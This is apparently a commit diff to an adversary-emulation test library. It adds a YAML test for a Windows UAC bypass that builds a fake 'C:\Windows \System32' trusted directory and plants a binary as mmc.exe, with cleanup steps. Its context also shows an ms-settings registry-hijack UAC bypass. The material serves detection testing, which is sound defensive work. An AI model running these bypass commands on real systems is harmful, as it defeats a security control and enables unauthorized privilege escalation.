T1088 mocking trusted directories - New Atomic (#704)

* Created rough draft for new atomic: T1088 - UAC Bypass via Mocking Trusted Directories. * Fixed typo in Mocked directory. Tested cleanup commands successfully. * Fixed path of cleanup command to match change in directory of primary command.
2019-12-02 10:39:07 -06:00
parent 380a113809
commit bb945c8d61
1 changed files with 25 additions and 1 deletions
@@ -115,4 +115,28 @@ atomic_tests:
      Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
      Start-Process "C:\Windows\System32\ComputerDefaults.exe"
    cleanup_command: |
-      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
+      Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
+
+- name: Bypass UAC by Mocking Trusted Directories
+  description: |
+    Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    executable_binary:
+      description: Binary to execute with UAC Bypass
+      type: path
+      default: C:\Windows\System32\cmd.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: true
+    command: |
+      mkdir "\\?\C:\Windows \System32\"
+      copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
+      mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
+    cleanup_command: |
+      rd "\\?\C:\Windows \" /S /Q
+      del "c:\testbypass.exe"